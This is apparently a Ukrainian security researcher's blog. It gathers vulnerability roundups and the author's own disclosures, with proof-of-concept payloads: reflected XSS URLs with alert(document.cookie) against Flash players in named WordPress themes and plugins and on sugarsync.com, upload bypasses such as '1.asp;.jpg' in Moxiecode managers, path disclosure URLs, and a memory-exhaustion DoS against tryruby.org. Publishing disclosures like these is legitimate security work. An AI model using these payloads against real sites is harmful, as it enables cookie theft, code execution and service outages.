Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Cisco AnyConnect VPN Client Verification Bypass Remote Code Execution Vulnerability (деталі)
• SQL Injection Vulnerability in Symphony (деталі)
• Cisco AnyConnect VPN Client Arbitrary Program Instantiation Remote Code Execution Vulnerability (деталі)
• PHP Code Injection in FUDforum (деталі)
• Multiple Vulnerabilities in Cisco AnyConnect Secure Mobility Client (деталі)
• Reflected Cross-Site-Scripting (XSS) vulnerability in e107 CMS v1.0.2 (деталі)
• TVMOBiLi Media Server Multiple Remote DoS Vulnerabilities (деталі)
• Vanilla Forums 2.0.18 / SQL-Injection / Insert arbitrary user & dump usertable (деталі)
• SonicWALL CDP 5040 v6.x - Multiple Web Vulnerabilities (деталі)
• Multiple Full Path Disclosure Vulnerabilities in TinyWebGallery <= v1.8.9 (деталі)

У вересні, 12.09.2012, я знайшов Denial of Service уразливість на сайті http://tryruby.org. Ця уразливість працює й досі. Про що найближчим часом сповіщу адміністрацію сайта.

TryRuby - це онлайновий інтерпретатор Ruby. Подібний до мого інтерпретатору MustLive Perl Pascal Programs Interpreter, що я розробив в 2006 році.

DoS:

http://tryruby.org/levels/1/challenges/0

“aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa” * 1000000

При відправленні даного коду в інтерпретатор (повторення рядка на 1 мільйон або більше разів), відбувається сильне навантаження сервера. Для атаки потрібно постійно слати подібний код через спеціальний PUT запит, щоб тримати сайт недоступним.

DoS відбувається через забивання доступної пам’яті сервера. Спочатку інтерпретатор відповідає “Something’s gone wrong”, а потім починає відповідати “java.lang.OutOfMemoryError: Java heap space” (з чого видно, що він зроблений на Java). Серверні обмеження JVM захищають від забивання усієї пам’яті сервера одним запитом, але пославши серію запитів можна повністю завантажити сервер.

03.04.2013

У лютому, 20.02.2013, я знайшов Arbitrary File Uploading уразливості в Moxiecode Image Manager (MCImageManager) для TinyMCE. Про що вже повідомив розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

18.05.2013

Arbitrary File Uploading (WASC-31):

http://site/path/tiny_mce/plugins/imagemanager/pages/im/index.html

Плагін MCImageManager для TinyMCE вразливий до обхідних атак при завантаженні файлів. Що призводять до виконання коду на веб серверах IIS і Apache.

Код виконається через завантаженні файла. Програма вразлива до двох методів виконання коду: через використання символа “;” (1.asp;.jpg) в імені файла (IIS), через подвійне розширення (1.php.jpg) (Apache).

Вразливі Moxiecode Image Manager 3.1.5 та попередні версії. В квітні розробник пообіцяв виправити дані уразливості в новій версії веб додатку.

02.04.2013

У лютому, 20.02.2013, я знайшов Arbitrary File Uploading уразливості в Moxiecode File Manager (MCFileManager) для TinyMCE. Про що вже повідомив розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

17.05.2013

Arbitrary File Uploading (WASC-31):

http://site/path/tiny_mce/plugins/filemanager/pages/fm/index.html

Плагін MCFileManager для TinyMCE вразливий до обхідних атак при завантаженні файлів. Що призводять до виконання коду на веб серверах IIS і Apache.

Код виконається через завантаженні файла. Програма вразлива до трьох методів виконання коду: через використання символа “;” (1.asp;.txt) в імені файла (IIS), через “1.asp” в імені папки (IIS), через подвійне розширення (1.php.txt) (Apache).

Вразливі Moxiecode File Manager 3.1.5 та попередні версії. В квітні розробник пообіцяв виправити дані уразливості в новій версії веб додатку.

В даній добірці уразливості в веб додатках:

• Nagios XI Network Monitor Blind SQL Injection (деталі)
• icinga security update (деталі)
• Nagios XI Network Monitor OS Command Injection (деталі)
• Path Traversal in AWS XMS (деталі)
• IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday) (деталі)
• MailOrderWorks v5.907 - Multiple Web Vulnerabilities (деталі)
• HP Integrated Lights-Out iLO3 and iLO4, Remote Disclosure of Information (деталі)
• Update Spoofing Vulnerability in mRemote 1.50 (деталі)
• MPC (Media Player Classic) WebServer Multiple Vulnerabilities (деталі)
• Update Spoofing Vulnerability in Royal TS 2.1.5 (деталі)

У лютому, 07.02.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в темах для WordPress, що містять VideoJS. Раніше я писав про уразливості в VideoJS.

Це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в багатьох веб додатках. При стандартному пошуку VideoJS через Гугл дорки виводиться 446000 сайтів, а при пошуку по плагінам для WordPress можна знайти 171000 сайтів з цією флешкою.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них Covert VideoPress, Photolio, Source, Smartstart та Crius. Та існують інші уразливі теми для WordPress з video-js.swf (судячи з гугл дорка). Розробники VideoJS випустили оновлення свого плеєра і всім розробникам веб додатків з VideoJS потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

Існують теми з багатьма флеш медіа плеєрами: окрім VideoJS вони мають jPlayer і JW Player. І такі теми мають усі XSS та Content Spoofing уразливості, які мають jPlayer і JW Player.

Covert VideoPress:

http://site/wp-content/themes/covertvideopress/assets/video-js.swf?readyFunction=alert(document.cookie)

Photolio:

http://site/wp-content/themes/photolio/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/photolio/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/photolio/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/photolio/js/jwplayer/video-js.swf?readyFunction=alert(document.cookie)

Source:

http://site/wp-content/themes/source/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/source/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/source/js/video/video-js.swf?readyFunction=alert(document.cookie)

Smartstart:

http://site/wp-content/themes/smartstart/js/video-js.swf?readyFunction=alert(document.cookie)

Crius:

http://site/wp-content/themes/crius/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/crius/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/crius/js/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/crius/js/video-js.swf?readyFunction=alert(document.cookie)

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/covertvideopress/

http://site/wp-content/themes/photolio/

http://site/wp-content/themes/source/

http://site/wp-content/themes/smartstart/

http://site/wp-content/themes/crius/

Вразливі всі версії наступних веб додатків: Covert VideoPress, Photolio, Source, Smartstart та Crius.

Вразливі веб додатки, що використовують VideoJS Flash Component 3.0.2 і попередні версії. Версія VideoJS Flash Component 3.0.2 не вразлива до згаданої XSS дірки, але вразлива до XSS через JS калбеки (подібно до JW Player). А також є обхідні методи, що працюють в останній версії, але розробники не виправили їх через їхній невеликий вплив. Тому розробникам веб додатків з VideoJS потрібно оновити його до останньої версії.

У лютому, 07.02.2013, я виявив Cross-Site Scripting уразливості в плагінах для WordPress, що містять VideoJS. Раніше я писав про уразливості в VideoJS.

Це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в багатьох веб додатках. При стандартному пошуку VideoJS через Гугл дорки виводиться 446000 сайтів, а при пошуку по плагінам для WordPress можна знайти 178000 сайтів з цією флешкою.

На додачу до плагіна VideoJS - HTML5 Video Player for WordPress, про якого я писав раніше, ось нові плагіни з цим плеєром. Серед них Video Embed & Thumbnail Generator, External “Video for Everybody”, 1player, S3 Video і EasySqueezePage. Та існують інші уразливі плагіни для WordPress з video-js.swf (судячи з гугл дорка). Розробники VideoJS випустили оновлення свого плеєра і всім розробникам веб додатків з VideoJS потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

Video Embed & Thumbnail Generator:

http://site/wp-content/plugins/video-embed-thumbnail-generator/video-js/video-js.swf?readyFunction=alert(document.cookie)

External “Video for Everybody”:

http://site/wp-content/plugins/external-video-for-everybody/video-js/video-js.swf?readyFunction=alert(document.cookie)

1player:

http://site/wp-content/plugins/1player/players/video-js/video-js.swf?readyFunction=alert(document.cookie)

S3 Video:

http://site/wp-content/plugins/s3-video/misc/video-js.swf?readyFunction=alert(document.cookie)

EasySqueezePage:

http://site/wp-content/plugins/EasySqueezePage/videojs/video-js.swf?readyFunction=alert(document.cookie)

Вразливі наступні веб додатки: Video Embed & Thumbnail Generator 4.0.3 і попередні версії, External “Video for Everybody” 2.0 і попередні версії, 1player 1.2 і попередні версії, S3 Video 0.97 і попередні версії, EasySqueezePage (всі версії).

Вразливі веб додатки, що використовують VideoJS Flash Component 3.0.2 і попередні версії. Версія VideoJS Flash Component 3.0.2 не вразлива до згаданої XSS дірки, але вразлива до XSS через JS калбеки (подібно до JW Player). А також є обхідні методи, що працюють в останній версії, але розробники не виправили їх через їхній невеликий вплив. Тому розробникам веб додатків з VideoJS потрібно оновити його до останньої версії.

В даній добірці уразливості в веб додатках:

• HP LaserJet Pro 400 Multi Function Printers, Remote Unauthorized Access (деталі)
• Multiple vulnerabilities in Open-Xchange (деталі)
• HP LaserJet and Color LaserJet, Cross-Site Scripting (XSS) (деталі)
• zoneminder security update (деталі)
• HP Intelligent Management Center User Access Manager (UAM), Remote Execution of Arbitrary Code (деталі)
• typo3-src security update (деталі)
• Buffer overflow in Cisco Unified MeetingPlace Web Conferencing (деталі)
• smokeping security update (деталі)
• SQL injection vulnerability in Cisco Unified MeetingPlace (деталі)
• SynConnect PMS SQL Injection Vulnerability (деталі)

26.03.2013

У березні, 15.03.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в плагіні Search and Share для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в BuddyPress для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

11.05.2013

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну.

http://site/wp-content/plugins/search-and-share/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Full path disclosure (WASC-13):

http://site/wp-content/plugins/search-and-share/SearchAndShare.php

http://site/wp-content/plugins/search-and-share/error_log (на сайтах, де відключене виведення помилок в php-файлах і вони записуються в error_log)

Уразливі Search and Share 0.9.3 та попередні версії. Додаток може працювати як плагін для WP, так і як стаціонарна програма.

25.01.2013

У грудні, 07.12.2012, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на популярному проекті https://www.sugarsync.com. Про що найближчим часом сповіщу адміністрацію сайта.

Хмарні сервіси такі ж діряві, як й звичайні онлайн сервіси. Що добре видно по уразливостям на них та взломам таких сервісів, як це мало місце з Dropbox.

Детальна інформація про уразливості з’явиться пізніше.

10.05.2013

XSS:

https://username.sugarsync.com/account/upgrade?returnUrl=%27;alert(document.cookie)//

В адресі вказується логін (username) користувача сервісу. Код спрацює при кліку на кнопки “OK” і “Cancel”. Це strictly social XSS.

Insufficient Anti-automation:

https://www.sugarsync.com/signup?startsub=5

З даних уразливостей XSS вже виправлена, але IAA все ще не виправлена. При цьому на сайті є ще багато інших дірок, на що я вже звертав увагу адміністраторів під час спілкування з приводу цих уразливостей.